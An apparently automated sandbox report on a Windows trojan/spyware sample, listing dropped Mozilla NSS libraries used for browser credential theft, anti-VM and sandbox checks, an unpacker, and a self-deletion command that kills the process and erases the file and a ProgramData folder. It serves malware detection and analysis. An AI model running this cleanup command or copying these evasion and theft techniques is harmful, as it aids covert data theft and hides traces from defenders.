Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00413C90	5_2_00413C90
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00413060	5_2_00413060
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00413AA0	5_2_00413AA0
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00404B10	5_2_00404B10
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_005F4351	5_2_005F4351

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: String function: 00408C20 appears 41 times
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: String function: 00422F70 appears 391 times

Source: buIKlB688e.exe	Binary or memory string: OriginalFilename vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000000.00000002.370724291.0000000001280000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000000.00000002.378147940.0000000007410000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll< vs buIKlB688e.exe
Source: buIKlB688e.exe	Binary or memory string: OriginalFilename vs buIKlB688e.exe
Source: buIKlB688e.exe	Binary or memory string: OriginalFilename vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000005.00000003.378804313.000000000345B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000005.00000003.377373701.0000000003337000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll8 vs buIKlB688e.exe
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll8 vs buIKlB688e.exe
Source: buIKlB688e.exe	Binary or memory string: OriginalFilenameApartmentSta.exe4 vs buIKlB688e.exe

Source: sqlite3.dll.5.dr

Static PE information: Number of sections : 19 > 10

Source: buIKlB688e.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: buIKlB688e.exe

ReversingLabs: Detection: 26%

Source: buIKlB688e.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\buIKlB688e.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\buIKlB688e.exe 'C:\Users\user\Desktop\buIKlB688e.exe'
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364	Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 5364)

Source: C:\Users\user\Desktop\buIKlB688e.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\buIKlB688e.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/13@1/1

Source: C:\Users\user\Desktop\buIKlB688e.exe

File read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini

Jump to behavior

Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, nss3.dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: buIKlB688e.exe, 00000005.00000003.373796904.0000000003471000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: buIKlB688e.exe, 00000005.00000003.381252668.0000000003A20000.00000004.00000001.sdmp, sqlite3.dll.5.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.5.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.5.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\Desktop\buIKlB688e.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01

Source: C:\Users\user\Desktop\buIKlB688e.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: buIKlB688e.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: buIKlB688e.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source:	Binary string: vcruntime140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.381792597.0000000003321000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: buIKlB688e.exe, 00000005.00000003.377228818.0000000003346000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: buIKlB688e.exe, 00000005.00000003.370347222.0000000003337000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source:	Binary string: msvcp140.i386.pdb source: buIKlB688e.exe, 00000005.00000003.378362447.00000000033A0000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.5.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: buIKlB688e.exe, 00000005.00000003.376829524.000000000336B000.00000004.00000001.sdmp, freebl3.dll.5.dr

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: buIKlB688e.exe, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.buIKlB688e.exe.a30000.0.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.buIKlB688e.exe.a30000.0.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.buIKlB688e.exe.310000.0.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.buIKlB688e.exe.310000.0.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.buIKlB688e.exe.5f0000.0.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.buIKlB688e.exe.5f0000.1.unpack, WinMixer/frmMain.cs	.Net Code: ExceptionFromErrorCode System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 0_2_00A364D9 push es; ret	0_2_00A3659A
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 4_2_003164D9 push es; ret	4_2_0031659A
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00408C65 push ecx; ret	5_2_00408C78
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_005F64D9 push es; ret	5_2_005F659A

Source: sqlite3.dll.5.dr	Static PE information: section name: /4
Source: sqlite3.dll.5.dr	Static PE information: section name: /19
Source: sqlite3.dll.5.dr	Static PE information: section name: /35
Source: sqlite3.dll.5.dr	Static PE information: section name: /51
Source: sqlite3.dll.5.dr	Static PE information: section name: /63
Source: sqlite3.dll.5.dr	Static PE information: section name: /77
Source: sqlite3.dll.5.dr	Static PE information: section name: /89
Source: sqlite3.dll.5.dr	Static PE information: section name: /102
Source: sqlite3.dll.5.dr	Static PE information: section name: /113
Source: sqlite3.dll.5.dr	Static PE information: section name: /124
Source: mozglue.dll.5.dr	Static PE information: section name: .didat
Source: msvcp140.dll.5.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_0041C810

Source: initial sample

Static PE information: section name: .text entropy: 7.84635094677

Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_00419700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00419700

Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.buIKlB688e.exe.2e80294.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.buIKlB688e.exe.2e546a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.371477115.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: buIKlB688e.exe PID: 7132, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\buIKlB688e.exe TID: 7136	Thread sleep time: -43945s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe TID: 7152	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\buIKlB688e.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\buIKlB688e.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\buIKlB688e.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041B4E0 GetSystemInfo,

5_2_0041B4E0

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	5_2_004043DF
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	5_2_00420540
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	5_2_0041E640
